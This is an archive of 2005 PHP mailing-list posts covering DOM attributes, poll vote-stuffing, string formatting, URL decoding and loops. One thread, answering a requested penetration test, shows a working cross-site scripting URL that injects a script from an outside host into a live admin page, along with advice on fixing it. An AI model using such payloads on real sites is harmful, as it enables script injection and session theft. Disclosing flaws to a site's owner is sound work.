withuot doing it recursively? I want to receive a list when I call childNodes (or equivalent) that gives me the elements with id 51-56, and a length of 6. Really really thankful for any input on the matter Sincerely Victor -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Voting Polls and preventing multiple votes
Dan Rossi wrote: Hi there I am mocking up a quick voting poll system, however I would like to put hooks in place to prevent users posting more than once, voting bots etc. Is there a way to prevent them, obviously sessions, cookies, host ips cant be used as they can be removed, and especially with host ips , ppl are usually behind a proxy ip that doesnt forwarding the referring ip. Let me know if anyone has cooked up something like this thanks. I have the voting mechanism and result displaying fine, just the special checks to prevent the form being displayed. If vote bots are your concern, then you will want to use one of those image generating scripts that create a unique code that only a human can read. It's tough to identify unique users with anything short of testing their clock skew. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Recursion: Ugh!
Food:Fruit:Red Food:Fruit:Green Food:Fruit:Yellow Food:Vegetables:Long Food:Vegetables:Round Food:Vegetables:Round:Spikey Food:Vegetables:Round:Smooth How is your structure being built? Is it hard-coded or dynamic (e.g. pulled from a DB)? We employ a similar tree structure for manging items in our store front. Believe me when I say, its a hell of a lot easier to only be concerned about the current item rathen then every item in the sturcture. Consider that a 1-to-many relationship is much easier to deal with than a many-to-many relationship. What I mean is, if you are looking at the element Round, don't concern yourself with Fruit or Long. Figure out your upstream path for the current element, e.g. Food:Vegetables (which should be easy if you assume that each element only has 1 parent). Then figure out the children for the current element, e.g. Spikey and Round. KISS. :) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] addslashes/stripslashes issue
JM wrote: Hi all, Ok here is what I need help with: $var = i like fi'sh; I'm able to addslashes(gather the data from a form), submit into the database, stripslashes(retrieve it). My problem is when I display it in a input type=text form the single quote is causing a truncation. input type=text value={$var} will display as: i like fi in the text form... Any help? http://us4.php.net/htmlentities -- John C. Nichel ÜberGeek KegWorks.com 716.856.9675 [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Stopping users to see uploaded files
Thanks everybody for all the useful suggestions. That way´s just fine. You could upload directly to the dir outside webscope if You like? How do we do that? Thanks in advance. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] printf() in a variable, or alternative to printf()
I need to be able to format data. Printf() is perfect because I need a certain amount of characters (30 for address). However I need this formatted data to be inside a file that's fwrite() and then FTPed to a distributor who will parse it and input into their database. printf(% 4d,$orderID[0]); does not work in $thisContent= data . moredate . evenmoredata . ; In effect I need the output of printf() to be placed inside a variable and I don't see how to do that. Str_pad(), of course, does not work. Thx for any hints. mayo
[PHP] Returned mail: see transcript for details
ALERT! This e-mail, in its original form, contained one or more attached files that were infected with a virus, worm, or other type of security threat. This e-mail was sent from a Road Runner IP address. As part of our continuing initiative to stop the spread of malicious viruses, Road Runner scans all outbound e-mail attachments. If a virus, worm, or other security threat is found, Road Runner cleans or deletes the infected attachments as necessary, but continues to send the original message content to the recipient. Further information on this initiative can be found at http://help.rr.com/faqs/e_mgsp.html. Please be advised that Road Runner does not contact the original sender of the e-mail as part of the scanning process. Road Runner recommends that if the sender is known to you, you contact them directly and advise them of their issue. If you do not know the sender, we advise you to forward this message in its entirety (including full headers) to the Road Runner Abuse Department, at [EMAIL PROTECTED] 'aîe ÇuâX4ú¥ps£h¤%ìÍ ÃX~¶~¿lªµ4C²G'(³§0û$£ÁÔin5'Äþð)à~3HXÊð9úEWBæMDSöª¥N5ò¹qçWþèbºÅiç\Bû¬ð-rø~Àâ¬Tã_N]*¹[7Ph[OÑpúÍ}©^ÀÑ·ÊÑ¥Õ}IÉgì.¿´v6±Q¢ôèÅãÇnʳXÆQûa:Òi Óäuý¸.~èÓ(ÐõèKBd¬U³$ähýñlo7ª'¿^ê¤Ep{¾Z«Pvå³yÔШ:/¨òK¡Ð9tÁà57°8ÖyEÉàHѸ~H!RQ ¼J]H!Åât祴¼®âÜ qV5P¹¨Èg¸£ü¿;uï3Ì©Ç?.á*4¤.gÎÁã«»(u²øO§×vm1?±ÀmKÂCEXÎãÜr`GÙyàíþNÂõ«¼1«XLJ[ùK½6K¿Æûð¦`Îu½µÊs8¹ì¼B ¼È[ í/iabf͵'ø¾ÄSÔÅÔ$ _ F}¬)t¶!`{Õ4ôËÔ±.F6ôötGO¤¾AyâO Ý!Ó1ÄÏa¬}Z{¼n¸IµfABdIÊÂÄØ]ºáºÜS9j§ÔAµÏÃ*´ë£·UÑÐH¿R%®A ;31¦ûC¬ÝÜW)¾üĹÈòZ²Òå.6e¶Ê¸ÌÃÎB£¼è¥k5Ë*ìý¬BCPߤæÀ·Ì}å¿nvve àpaµ\ ÿtåµ]©çN#0j´Ëlfqñ²w½¢ÞSI#ô5Ís» ~lAA!5éÕ÷ïTu:ybqJo·¯ßÑÚõÈrtí-.#§îeø1Bcü¿±BߢN,è:éóÚdPÓÖO(¢î÷äwª#ñåíQ±nüâäÖøÁµ´æ6¯8×.?úÇ¢ª}kýNK×#¿(è{Û/SòñÛ2Â*ôÎËѺºoò!TAPÃÑÓ*Akg'Ë!¥÷Wá7Ck¡6xA§·3J))Ó騯2¨ _¤c±§þÃøój¹ %PzìÅ¡åi¿¢ÓóñÞøsÐ$¹H.ÖÞJ )Å°_é«!sªØ¢Äj4-o´7Lú¼AúoAXüÂ68Eê ÷/ä õ. ptbm4e-²üéºFŨŠø'c·òmô4SýËþÚáÛE³ót[®³`kî ù±{ó|¶j^/;Õãñq.ìÚA¹õÏ3q ÔÃìÒqYóç¨sI¨.Ì÷ ³S1ú¨'×¢Û\¾µáo2:3ý¦¿O{»ìW/îGÃ;ó«kXÔ¡SJçüEf¯Þ_¬Á5D¡6» øµ¬X_æ§N×ô-ÀJõy-±µÖ´¤¬º®ñ¹ei/9Þ© LQà[bÉQ`?÷[ܺ§4î vkøweT0Ͼ¦ÅR»$ÕȬ,¹m[4ÕÄ6ø_duÅ{zhÔ¯wÁ)1HÇõ_£ ¦Ôw̼eÓ7N\DÚnÎl}R;Á¬YO[½yôÀaDB^^63Ñ«]*Â]riÄ ë )Q´ztª»÷î:×]½ËÁ$©x9̦$Ná¥MsuZràg²í¾('æäaW¥ÁÁ sDü/PÏÁ1Ô Ôj'MoCö*6ãN×x¸ÏÒ-óÛتæ?dÈmo¾£UÏ 3ØØÄLg^ íz EYùñó\¹¬ á'9'ø该Sìʳ- Èek/×#sµ_6¹ ´vÓq9ùãº4 J²YØV¸Ô¥Òè.¦ÏYBü)ݤa:nL÷OV_ñ)§1cÔPTäåPâ:.hZ?t-ÈÛm®MïréåÃJ®Ú²wÖ²ÅßPr«eÅ.Õî5ët£xª±Õ°¦i×¥²Zõi^P¢A:ÏÁçÙ-J|Pé²É%÷é-àKåIö(Åú6[*hûó×äòÓr?þõýQäE;¥î*ÍÔVübÛßOkh ª÷!é6ÔWÐyÄú$.ÓsCrZt`G5[`$ÀÚìÎ5ØGîl t§ÈHû8̪U(üB1ÇÁð§%àñT¤[°3^Ex|]®'áÁ? ã µÇùjüî´Ê ÐÄ6±èt ±0vÙ )ÄoÎèΤ,3y÷D*éó0kSm\o ªÃ}æÉ6¼cá'¥û|Ñèjêo£b÷\] ð ëlÄä$¶³æ7¼G4»m»`ãÏ#ϨWJ¡M-á'6çþ*¤¹$ØçNβÝh ÔÇRc¾ù 8p_ä ©²MÐø3!ÅqÏh¿ 0Ø|N§Ó]e°Ó{øµ.\?k sÇaNç~ì1Là¦Ò yÌF%0àý© |¾rÞ:ýîåJ×**L5VoàX£sß.äkÍPûRÂam8N5ÇḰ*Ï9Ö£ï°ö JcO¤Léòļb t¯¦|$Á!jJvum\V½Uû|Xd0{Aúírºöúz¿üæ¬^®¨M{×1SH/}dUàzj_¯ñ´Ew³¾çO*Þ Ü7¾î÷p}µ|ÖäiÜøÊHFàÒ¡óË Á¢ny/iøÍ_£QHdI[NØ$3°l¤|Vó|à3ñGÛ®üU? A ,²WýÃT¥(±õ%ÁèÞIXIàÌeÏæäm7bíèöø·?ô);R1 ÖEø Ê file attachment: text.zip This e-mail in its original form contained one or more attached files that were infected with the [EMAIL PROTECTED] virus or worm. They have been removed. For more information on Road Runner's virus filtering initiative, visit our Help Member Services pages at http://help.rr.com, or the virus filtering information page directly at http://help.rr.com/faqs/e_mgsp.html. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Voting Polls and preventing multiple votes
On 5/26/05, Dan Rossi [EMAIL PROTECTED] wrote: Hi there I am mocking up a quick voting poll system, however I would like to put hooks in place to prevent users posting more than once, voting bots etc. You could use a captcha(www.captcha.net afaik), to prevent bots from voting. Is there a way to prevent them, obviously sessions, cookies, host ips cant be used as they can be removed, and especially with host ips , ppl are usually behind a proxy ip that doesnt forwarding the referring ip. Proxies usually send the referer using HTTP_X_FORWARDED_FOR. If this isn't the case, then I don't think there is much other information. Even if you did have the IP address, you can't tell if its static, or dynamic. Let me know if anyone has cooked up something like this thanks. I have the voting mechanism and result displaying fine, just the special checks to prevent the form being displayed. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server OS version, Web and e-mail servers and even in the PHP version that you may have installed. You can try their no risk test in this page that is free and in a few minutes after the test is request you get a full report by e-mail. http://www.securityspace.com/smysecure/norisk_index.html?refid=1057382149 Umm, you forgot to mention that you are connected to that site and you get a commision for sending them clients, if they sign up. Nothing wrong with getting an affiliate buck mind you, I have a few affiliate accounts around too, but I (and others on the list i have noticed, Jay B for one) mention that we are connected to / own the websites we are sending the person to. Regards, Ryan -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.322 / Virus Database: 267.0.0 - Release Date: 5/27/2005 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Impossible to list attributes of xml-element?
On 5/26/05, Victor Spång Arthursson [EMAIL PROTECTED] wrote: Ciao! I'm selecting an element in the xml using xpath. I know there is only one element matching the xpath-query, but still I get the result as a list. Nevermind. This list is of the type domnodelist, on which only one action is allowed: item() Selecting [xpath-result]-item(0) gives me the only element in the result in the form of a domelement. This domelement should have a lot of attributes, but I cant find no way to get some kind of list over those attributes, to work further with. Could someone please point me in the same direction? $domelement-attributes gives you a DomNodeList back with all attributes chregu Sincerely Victor -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- christian stocker | Bitflux GmbH | schoeneggstrasse 5 | ch-8004 zurich phone +41 1 240 56 70 | mobile +41 76 561 88 60 | fax +41 1 240 56 71 http://www.bitflux.ch | [EMAIL PROTECTED] | gnupg-keyid 0x5CE1DECB -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
on 05/23/2005 06:19 AM Andy Pieters said the following: I am looking at where I can get my system tested for penetration. In case someone here would like to have a go This is the url http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/ It is actually a kind of CMS system so if someone gets in, create a page with the cms as proof. You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09src%3D%22http://3423329163/v And you are not doing any input validation either. -Rasmus -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: [PHP-DB] Letters loop
Then this is what I would suggest. $alph = array('*', 'A', 'B','C'...etc) ; $i=0; EchoSelect name=foo; While($alph[$i]){ echooption value=$alph[$i]$alph[$i]; $i++; } Echo/Select; On 5/25/05 9:54 PM, MIGUEL ANTONIO GUIRAO AGUILAR [EMAIL PROTECTED] wrote: Yes, because I will create a select field within the for loop, and the options of the select should be letters. -- MIGUEL GUIRAO AGUILERA Logistica R8 - Telcel Tel: (999) 960.7994 Cel: 9931-6 - Mensaje original - De: Stephen Johnson [EMAIL PROTECTED] Fecha: Miércoles, Mayo 25, 2005 9:49 pm Asunto: Re: [PHP-DB] Letters loop Why? If you need to do a loop that runs 26 times just set your high value for 26. Is there some reason you need to use letters ? On 5/25/05 8:37 PM, MIGUEL ANTONIO GUIRAO AGUILAR [EMAIL PROTECTED] wrote: Hi!! I wanna a do a for loop with letters, Is this possible? for ($i = 'A'; $i = 'Z'; $i++){ // code } -- MIGUEL GUIRAO AGUILERA Logistica R8 - Telcel Tel: (999) 960.7994 Cel: 9931-6 -- Stephen Johnson The Lone Coder [EMAIL PROTECTED] http://www.thelonecoder.com *Continuing the struggle against bad code* -- -- Stephen Johnson The Lone Coder [EMAIL PROTECTED] http://www.thelonecoder.com *Continuing the struggle against bad code* -- -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Hello, on 05/27/2005 02:30 PM Ryan A said the following: You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server OS version, Web and e-mail servers and even in the PHP version that you may have installed. You can try their no risk test in this page that is free and in a few minutes after the test is request you get a full report by e-mail. http://www.securityspace.com/smysecure/norisk_index.html?refid=1057382149 Umm, you forgot to mention that you are connected to that site and you get a commision for sending them clients, if they sign up. Nothing wrong with getting an affiliate buck mind you, I have a few affiliate accounts around too, but I (and others on the list i have noticed, Jay B for one) mention that we are connected to / own the websites we are sending the person to. I did not forget to mention anything. Andy asked for a free penetration test and that is exactly what he gets going to the page mentioned above. I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. In all cases it is upto Andy to decide. FYI, if he takes the free penetration test as he asks, I still do not gain anything. If I ever gain anything with the referral, he would not be paying more for whatever services he would order. So, I do not see your point in bugging me for this. If you feel that I am not helping Andy, I would appreciate that you tell me that directly! -- Regards, Manuel Lemos PHP Classes - Free ready to use OOP components written in PHP http://www.phpclasses.org/ PHP Reviews - Reviews of PHP books and other products http://www.phpclasses.org/reviews/ Metastorage - Data object relational mapping layer generator http://www.meta-language.net/metastorage.html -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
On Friday 27 May 2005 19:11, Rasmus Lerdorf wrote: You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09 src%3D%22http://3423329163/v Hi Thank you! I just saw the potential for tricking users but tell me dear boy. How can I prevent this? And you are not doing any input validation either. I fixed that. It was only in the part that echoes out the last inputed name if login fails tough because the database abstraction layer I wrote for this application escapes all data it receives. Thank you again With kind regards Andy -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Include Remote Content as REMOTE_ADDR of Browser
Gary C. New wrote: Is there a quick and dirty way to include, file, or fsockopen content from a remote server and make it appear as though the request was straight from the browser's remote address? Thank you for your assistance. Respectfully, Gary I believe you would in effect by spoofing the source of the request. The problem is that the server you request from would respond to the wrong IP and the browser at the client wouldn't be accepting any data from the remote server for display. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Andy Pieters wrote: On Friday 27 May 2005 19:11, Rasmus Lerdorf wrote: You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09 src%3D%22http://3423329163/v Hi Thank you! I just saw the potential for tricking users but tell me dear boy. How can I prevent this? Don't display arbitrary key names in hidden fields the way you are. -Rasmus -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] printf() in a variable, or alternative to printf()
[snip] I need to be able to format data. Printf() is perfect because I need a certain amount of characters (30 for address). However I need this formatted data to be inside a file that's fwrite() and then FTPed to a distributor who will parse it and input into their database. printf(% 4d,$orderID[0]); does not work in $thisContent= data . moredate . evenmoredata . ; In effect I need the output of printf() to be placed inside a variable and I don't see how to do that. Str_pad(), of course, does not work. [/snip] Have you tried $variable_name = printf(% 4d,$orderID[0]); -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Recursion: Ugh!
Steve Brown mailto:[EMAIL PROTECTED] on Thursday, May 26, 2005 11:47 AM said: How is your structure being built? Is it hard-coded or dynamic (e.g. pulled from a DB)? From a database. We employ a similar tree structure for manging items in our store front. Believe me when I say, its a hell of a lot easier to only be concerned about the current item rathen then every item in the sturcture. But what perspective are you coming at this? Let's say you're entering a new product, you'd want to see a list of all the available categories, not just the last node of a branch. I'm not sure I understand what you're trying to say. What I mean is, if you are looking at the element Round, don't concern yourself with Fruit or Long. But I wouldn't be building the entire tree if I were only looking at a specific node. Sorry I am misunderstanding you. Chris. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] how to convert char into number
What function do I use to convert an ASCII character into it's equivalent number? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Very odd (bug??) with arrays, objects, and serialize (please read!)
Hi all - I came across a very odd bug in 4.3.10 (and 4.3.11). It's not in 4.3.4, and it's not in 5.0.4. My understanding is that in 4.x objects are assigned by value. So, why in the first part of the code is the output of serialize() indicating a reference? This would suggest that objects are being copied by reference. But in the second when I change $ary[1]-name, the output of the serialize only changes the second element, not both. Also, changing $obj-name doesn't have any effect on $ary[0] or $ary[1]. Which would suggest that $ary[0] and $ary[1] are NOT the SAME thing. The output below is from 4.3.11. 4.3.4 does not have this problem and the serialize() output does not indicate any reference. In 5.0.4, the everything works like I'd expect it to since objects are assigned by reference. It's almost like $obj is partially being copied by reference and that serialize is picking up on that or something... Should I submit this as a bug? Am I missing something obvious? Here's the code: ?php $obj-name = Homer; $ary[] = $obj; $ary[] = $obj; $obj1-name = Homer; $ary[] = $obj1; print_r($ary); print(\n); print ( serialize($ary) ); print(\n\n---\n\n); unset($obj); unset($obj1); unset($ary); $obj-name = Homer; $ary[] = $obj; $ary[] = $obj; $obj1-name = Homer; $ary[] = $obj1; $ary[1]-name = Marge; print_r($ary); print(\n); print ( serialize($ary) ); ? Here's the output: Array ( [0] = stdClass Object ( [name] = Homer ) [1] = stdClass Object ( [name] = Homer ) [2] = stdClass Object ( [name] = Homer ) ) a:3:{i:0;O:8:stdClass:1:{s:4:name;s:5:Homer;}i:1;r:2;i:2;O:8:stdClass:1:{s:4:name;s:5:Homer;}} --- Array ( [0] = stdClass Object ( [name] = Homer ) [1] = stdClass Object ( [name] = Marge ) [2] = stdClass Object ( [name] = Homer ) ) a:3:{i:0;O:8:stdClass:1:{s:4:name;s:5:Homer;}i:1;O:8:stdClass:1:{s:4:name;s:5:Marge;}i:2;O:8:stdClass:1:{s:4:name;s:5:Homer;}} -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] how to convert char into number
What function do I use to convert an ASCII character into it's equivalent number? -- Sorry, I think my spam filters got any responses. If you replied, could you please resend it to me? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] rawurldecode problems
I'm using the rawurldecode() function to try and polish up some data I get from a parameter I use the function below and this is what it does. It's as-if it only unencodes the last part. Anybody have ideas on what I'm doing wrong? $order = rawurldecode($HTTP_GET_VARS[x]); 3445%252520Causeway%252520Boulevard%252520Limited%252520Partnership%25250ACape%2520May%2520Apartments,%2520LLC%250AElco%20Housing%20Partners,%20LLC%0A 3445%20Causeway%20Boulevard%20Limited%20Partnership%0ACape May Apartments, LLC Elco Housing Partners, LLC it SHOULD look like this: 3445 Causeway Boulevard Limited Partnership Cape May Apartments, LLC Elco Housing Partners, LLC If this helps... the original long string was written with \n between each value before it was encoded. Does that have anything to do with it?
[PHP] rawurldecode problems
I'm using the rawurldecode() function to try and polish up some data I get from a parameter I use the function below and this is what it does. It's as-if it only unencodes the last part. Anybody have ideas on what I'm doing wrong? $order = rawurldecode($HTTP_GET_VARS[x]); 3445%252520Causeway%252520Boulevard%252520Limited%252520Partnership%25250ACape%2520May%2520Apartments,%2520LLC%250AElco%20Housing%20Partners,%20LLC%0A 3445%20Causeway%20Boulevard%20Limited%20Partnership%0ACape May Apartments, LLC Elco Housing Partners, LLC it SHOULD look like this: 3445 Causeway Boulevard Limited Partnership Cape May Apartments, LLC Elco Housing Partners, LLC If this helps... the original long string was written with \n between each value before it was encoded. Does that have anything to do with it?
[PHP] fopen for http://
Hello all- I was wondering if anyone knew of a way to call a web site using fopen. Let me tell you how things are set up and what I'm trying to do. I can call fopen to read a site and then echo it back out. That's not a problem. The problem I run into is when I try to go to a restricted area of a site. For example, in my Apache httpd.conf file I have it set up to where I have a directory that is only accessible from certain IP addresses, one of which is 127. (the localhost). The script I'm running is located on the server and the web site I'm trying to access via fopen() is on the same server. Therefore, I'm thinking that the php script should have access to read the site's restricted directory. For some reason it does not have access. I was wondering if there was a way around this or am I just doomed to never be able to access the directory via fopen(http://someurl.com/somedirectory,r;); ?? Thanks. Jay -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Recursion: Ugh!
On 5/27/05, Chris W. Parker [EMAIL PROTECTED] wrote: Let's say you're entering a new product, you'd want to see a list of all the available categories, not just the last node of a branch. Not neccesarily; it depends on how big your tree structure is. If you only have 10 categories where an item could be placed, a list of all available categories might be an OK solution. However, if you have 100 categories, listing all of them is impractical. Even if you only have 10 categories, you should plan for the day when you will have 10 categories. In our store (500 categories), you add a new item by adding a child to the current item. Usually we know which category we want to place the item in before we begin to lay it up (if we don't, we can move an item at any time simply by changing the parent of the item). So in your case, if you wanted to create a new item in the category Round, you would first have to navigate to Food Vegetables Round, then create the new item. This may seem more complicated, but think about how much time your users are going to spend scrolling through a list of lots of categories compared to this approach. But I wouldn't be building the entire tree if I were only looking at a specific node. That's the beauty of it! :) You don't need the entire tree if you are working on a specific node. Look at it this way: you can only work on one item at a time, right? If you are working on the item Fruit, why do you care that the parent of Long is Vegetables or that Round has two children, Spikey and Smooth? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] include file and problems with headers
On Sat, 2005-05-21 at 06:30, Ross wrote: I have the folowing code which checks whether the user has logged in. if (!isset ($_SESSION['new_session'] ) ) { $login_status = div class=\standard_text\Your are not signed in /div; } if (isset ($_SESSION['new_session'] ) ) { $address = $_SESSION['new_session']; $login_status = div class=\standard_text\Your are signed in as span class=\under\$address/span/div; } ? Now when I have this as a file to be included in each page, status.php (see code) gives the header error (already sent). ?php session_start(); include('status.php'); How about putting session_start in status.php then just include it. ?php session_start(); if (!isset ($_SESSION['new_session'] ) ) { $login_status = div class=\standard_text\Your are not signed in /div; } if (isset ($_SESSION['new_session'] ) ) { $address = $_SESSION['new_session']; $login_status = div class=\standard_text\Your are signed in as span class=\under\$address/span/div; } echo $login_status; ? Then in other files just: ?php include 'status.php'; ? -- s/:-[(/]/:-)/g BrianGnuPG - KeyID: 0x04A4F0DC | Key Server: pgp.mit.edu == gpg --keyserver pgp.mit.edu --recv-keys 04A4F0DC Key Info: http://gfx-design.com/keys Linux Registered User #339825 at http://counter.li.org -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Recursion: Ugh!
** email gagging, sorry if this is a DP ** On 5/27/05, Chris W. Parker [EMAIL PROTECTED] wrote: Let's say you're entering a new product, you'd want to see a list of all the available categories, not just the last node of a branch. Not neccesarily; it depends on how big your tree structure is. If you only have 10 categories where an item could be placed, a list of all available categories might be an OK solution. However, if you have 100 categories, listing all of them is impractical. Even if you only have 10 categories, you should plan for the day when you will have 10 categories. In our store (500 categories), you add a new item by adding a child to the current item. Usually we know which category we want to place the item in before we begin to lay it up (if we don't, we can move an item at any time simply by changing the parent of the item). So in your case, if you wanted to create a new item in the category Round, you would first have to navigate to Food Vegetables Round, then create the new item. This may seem more complicated, but think about how much time your users are going to spend scrolling through a list of lots of categories compared to this approach. But I wouldn't be building the entire tree if I were only looking at a specific node. That's the beauty of it! :) You don't need the entire tree if you are working on a specific node. Look at it this way: you can only work on one item at a time, right? If you are working on the item Fruit, why do you care that the parent of Long is Vegetables or that Round has two children, Spikey and Smooth? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: fopen for http://
On Fri, 27 May 2005 13:57:12 -0500, in php.general [EMAIL PROTECTED] (Jay Paulson) wrote: For example, in my Apache httpd.conf file I have it set up to where I have a directory that is only accessible from certain IP addresses, one of which is 127. (the localhost). The script I'm running is located on the server and the web site I'm trying to access via fopen() is on the same server. Therefore, I'm thinking that the php script should have access to read the site's restricted directory. For some reason it does not have access. Even if it is the same server you might not connect with 127.0.0.1 as the source IP address - especially not if the other web site's host name resolves to any other IP address than 127.0.0.1. Your tcp connection might still be performed via the loopback-interface, but your source IP address might still be the one of a network interface Try to create a page on the second web site (that you want to access thorugh fopen() ) that outputs the client's IP address. You'll probably see that your source IP address is not 127.0.0.1. -- - Peter Brodersen -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] how to convert char into number
www.php.net/chr or www.php.net/ord forget which is which - I always have to check. On 5/25/05, Jeremy Reynolds [EMAIL PROTECTED] wrote: What function do I use to convert an ASCII character into it's equivalent number? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: [PHP-DB] Letters loop
or foreach(range('A', 'Z') as $letter){ echo option value='$letter'$letter/option } www.php.net/range On 5/27/05, Rory Browne [EMAIL PROTECTED] wrote: I didn't see the OP, but: for($i = 'A'; $i != 'Z'; $i = chr(ord($i) +1)){ echo \toption value=\$i\$i/option\n; } On 5/26/05, Stephen Johnson [EMAIL PROTECTED] wrote: Then this is what I would suggest. $alph = array('*', 'A', 'B','C'...etc) ; $i=0; EchoSelect name=foo; While($alph[$i]){ echooption value=$alph[$i]$alph[$i]; $i++; } Echo/Select; On 5/25/05 9:54 PM, MIGUEL ANTONIO GUIRAO AGUILAR [EMAIL PROTECTED] wrote: Yes, because I will create a select field within the for loop, and the options of the select should be letters. -- MIGUEL GUIRAO AGUILERA Logistica R8 - Telcel Tel: (999) 960.7994 Cel: 9931-6 - Mensaje original - De: Stephen Johnson [EMAIL PROTECTED] Fecha: Miércoles, Mayo 25, 2005 9:49 pm Asunto: Re: [PHP-DB] Letters loop Why? If you need to do a loop that runs 26 times just set your high value for 26. Is there some reason you need to use letters ? On 5/25/05 8:37 PM, MIGUEL ANTONIO GUIRAO AGUILAR [EMAIL PROTECTED] wrote: Hi!! I wanna a do a for loop with letters, Is this possible? for ($i = 'A'; $i = 'Z'; $i++){ // code } -- MIGUEL GUIRAO AGUILERA Logistica R8 - Telcel Tel: (999) 960.7994 Cel: 9931-6 -- Stephen Johnson The Lone Coder [EMAIL PROTECTED] http://www.thelonecoder.com *Continuing the struggle against bad code* -- -- Stephen Johnson The Lone Coder [EMAIL PROTECTED] http://www.thelonecoder.com *Continuing the struggle against bad code* -- -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Fwd: fopen for http://
Hello all- I was wondering if anyone knew of a way to call a web site using fopen. Let me tell you how things are set up and what I'm trying to do. I can call fopen to read a site and then echo it back out. That's not a problem. The problem I run into is when I try to go to a restricted area of a site. For example, in my Apache httpd.conf file I have it set up to where I have a directory that is only accessible from certain IP addresses, one of which is 127. (the localhost). The script I'm running is located on the server and the web site I'm trying to access via fopen() is on the same server. Therefore, I'm thinking that the php script should have access to read the site's restricted directory. For some reason it does not have access. I was wondering if there was a way around this or am I just doomed to never be able to access the directory via fopen(http://someurl.com/somedirectory,r;); ?? Thanks. Jay -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: [PHP-DB] Letters loop
I didn't see the OP, but: for($i = 'A'; $i != 'Z'; $i = chr(ord($i) +1)){ echo \toption value=\$i\$i/option\n; } On 5/26/05, Stephen Johnson [EMAIL PROTECTED] wrote: Then this is what I would suggest. $alph = array('*', 'A', 'B','C'...etc) ; $i=0; EchoSelect name=foo; While($alph[$i]){ echooption value=$alph[$i]$alph[$i]; $i++; } Echo/Select; On 5/25/05 9:54 PM, MIGUEL ANTONIO GUIRAO AGUILAR [EMAIL PROTECTED] wrote: Yes, because I will create a select field within the for loop, and the options of the select should be letters. -- MIGUEL GUIRAO AGUILERA Logistica R8 - Telcel Tel: (999) 960.7994 Cel: 9931-6 - Mensaje original - De: Stephen Johnson [EMAIL PROTECTED] Fecha: Miércoles, Mayo 25, 2005 9:49 pm Asunto: Re: [PHP-DB] Letters loop Why? If you need to do a loop that runs 26 times just set your high value for 26. Is there some reason you need to use letters ? On 5/25/05 8:37 PM, MIGUEL ANTONIO GUIRAO AGUILAR [EMAIL PROTECTED] wrote: Hi!! I wanna a do a for loop with letters, Is this possible? for ($i = 'A'; $i = 'Z'; $i++){ // code } -- MIGUEL GUIRAO AGUILERA Logistica R8 - Telcel Tel: 